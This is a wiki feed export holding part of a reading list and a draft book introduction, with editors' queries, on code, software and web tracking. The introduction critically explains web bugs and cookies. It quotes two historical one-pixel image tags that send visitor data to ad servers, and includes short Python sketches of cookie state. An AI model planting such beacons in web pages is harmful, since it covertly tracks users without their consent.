&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes] &lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media] &lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda&lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Drucker Video}} &lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4701</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4701"/>
		<updated>2012-04-18T13:52:40Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how we live today in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and which I have elsewhere termed ''computationality'' (Berry, 2011). This highly mediated existence has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking of physical keyboards and trackpads, as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of so-called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
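&lt;br /&gt;
To make this ‘state management’ mechanism concrete, the following is a minimal sketch, in Python, of the exchange described in note [2]: the server sets a small piece of text on the first visit and reads it back on every subsequent request, which is all a tracker needs in order to recognise a returning visitor. The handler shape and the 'uid' cookie name are illustrative assumptions, not the practice of any particular company. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of HTTP 'state management' with a cookie: set a
# small piece of text on the first visit, read it back thereafter.
# The 'uid' name and the handler shape are illustrative assumptions.
from http.cookies import SimpleCookie
import uuid

def handle_request(request_headers):
    cookie = SimpleCookie(request_headers.get('Cookie', ''))
    if 'uid' in cookie:
        # Returning visitor: the browser replayed the cookie.
        return cookie['uid'].value, None
    # First visit: mint an identifier and ask the browser to keep it.
    uid = uuid.uuid4().hex
    fresh = SimpleCookie()
    fresh['uid'] = uid
    fresh['uid']['max-age'] = 60 * 60 * 24 * 365  # persist for a year
    return uid, fresh.output(header='Set-Cookie:')

uid, set_header = handle_request({})
print(set_header)  # e.g. Set-Cookie: uid=...; Max-Age=31536000
# The browser sends the cookie back, so the visitor is recognised:
print(handle_request({'Cookie': 'uid=' + uid})[0] == uid)  # True
&amp;lt;/pre&amp;gt; &lt;br /&gt;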
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
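&lt;br /&gt;
By way of contrast with such opacity, the information that a simple web 1.0 bug carries home is easy to see once its URL is unpacked. The following minimal sketch in Python rebuilds the second EFF example above from its parts using the standard library; the glosses in the comments are inferences from the parameter names, not documented facts about the preferences.com service. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# The second EFF web bug above encodes its payload in the query
# string of a one-pixel image request. Rebuilding it makes the fields
# visible; the glosses below are inferences, not documented facts.
from urllib.parse import urlencode, parse_qs

payload = {
    'ML_SD': 'IntuitTE_Intuit_1x1_RunOfSite_Any',
    'db_afcr': '4B31-C2FB-10E2C',      # looks like a visitor identifier
    'event': 'reghome',                # the action being logged
    'group': 'register',
    'time': '1999.10.27.20.56.37',     # timestamp of the visit
}
bug_src = 'http://media.preferences.com/ping?' + urlencode(payload)
print(bug_src)   # the SRC of the invisible one-pixel image
# The receiving server simply reverses the encoding:
print(parse_qs(urlencode(payload)))
&amp;lt;/pre&amp;gt; &lt;br /&gt;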
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 per user at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 per user at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d. Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Provider of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
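&lt;br /&gt;
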